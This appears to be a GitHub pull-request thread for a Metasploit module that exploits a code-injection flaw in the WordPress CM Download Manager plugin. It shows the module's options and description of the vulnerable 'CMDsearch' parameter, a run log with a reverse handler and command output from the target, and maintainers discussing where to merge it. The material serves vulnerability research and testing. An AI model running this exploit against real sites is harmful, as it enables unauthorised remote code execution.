wordpress cm-download-manager plugin code injection

[nixawk]

msf exploit(wp_cm_download_manager_exec) > info

       Name: Wordpress CM Download Manager Plugin Code Injection
     Module: exploit/unix/webapp/wp_cm_download_manager_exec
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2015-09-09

Provided by:
  Nixawk

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name     Current Setting          Required  Description
  ----     ---------------          --------  -----------
  CMD      dir                      no        Command to execute
  Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST    192.168.1.104            yes       The target address
  RPORT    80                       yes       The target port
  URI      /wordpress/cmdownloads/  yes       The full URI path to vBulletin
  VHOST                             no        HTTP server virtual host

Payload information:

Description:
  This module exploits a vulnerability in the alterSearchQuery() 
  function defined in 
  /wp-content/plugins/cm-download-manager/lib/controllers 
  /CmdownloadController.php for Wordpress CM Download Manager plugin 
  versions 2.0.0 and earlier. User input passed through 'CMDsearch' 
  GET parameter isn't properly sanitized before being used in a call 
  to preg_match_all(). This can be exploited to inject and execute 
  arbitrary code leveraging the PHP's complex curly syntax.

References:
  https://www.exploit-db.com/exploits/35324

msf exploit(wp_cm_download_manager_exec) > run

[*] Started reverse handler on 192.168.1.108:4444 
[*] 192.168.1.104:80 - Uploading payload
[*] The server returned: 200 OK
[*] 
             Volume in drive C has no label.
 Volume Serial Number is 2493-29F0

 Directory of C:\xampp\htdocs\wordpress

09/08/2015  09:31 PM    <DIR>          .
09/08/2015  09:31 PM    <DIR>          ..
09/08/2015  11:44 PM               256 .htaccess
09/24/2013  05:18 PM               418 index.php
01/01/2015  05:25 AM            19,930 license.txt
04/23/2015  11:00 AM             7,358 readme.html
08/20/2014  10:30 AM             4,951 wp-activate.php
09/08/2015  09:27 PM    <DIR>          wp-admin
01/08/2012  10:01 AM               271 wp-blog-header.php
01/08/2015  12:05 AM             5,007 wp-comments-post.php
05/09/2015  05:06 PM             2,764 wp-config-sample.php
09/08/2015  09:30 PM             3,046 wp-config.php
09/08/2015  11:43 PM    <DIR>          wp-content
05/24/2015  10:26 AM             3,286 wp-cron.php
09/08/2015  09:27 PM    <DIR>          wp-includes
10/24/2013  03:58 PM             2,380 wp-links-opml.php
04/12/2015  02:29 PM             3,123 wp-load.php
07/28/2015  08:56 PM            34,669 wp-login.php
07/17/2014  02:12 AM             8,252 wp-mail.php
06/24/2015  07:29 PM            11,062 wp-settings.php
06/26/2015  06:03 PM            25,124 wp-signup.php
11/30/2014  02:23 PM             4,035 wp-trackback.php
07/28/2015  05:17 AM             3,055 xmlrpc.php
              18 File(s)        138,987 bytes
               5 Dir(s)   1,587,908,608 bytes free

[wchen-r7]

Can you please give me a download link for the vulnerable version of the plugin? I can only find 2.2.7. Thanks.

[espreto]

@wchen-r7 I recommend submit this to WPSploit, because has only "Active Installs: 700+". Recalling @todb-r7 recommendation in this comment.

[nixawk]

We can reproduct the exploit with the newest version. Poc version is here.

[wchen-r7]

@espreto Do I want to merge this to MSF after submitting to WPSploit?

[todb-r7]

@wchen-r7, as @espreto noted, it's a pretty small installation footprint. "Mere hundreds" falls below the line.

[wchen-r7]

@espreto pull request created in your repository: espreto/wpsploit#5

[wchen-r7]

Hi @all3g It looks like @espreto is actively handling your pull request at espreto/wpsploit#5, so if you don't mind, please carry on the conversation over there, and I'd like to close this pull request here. Thanks.

[nixawk]

OK, thanks.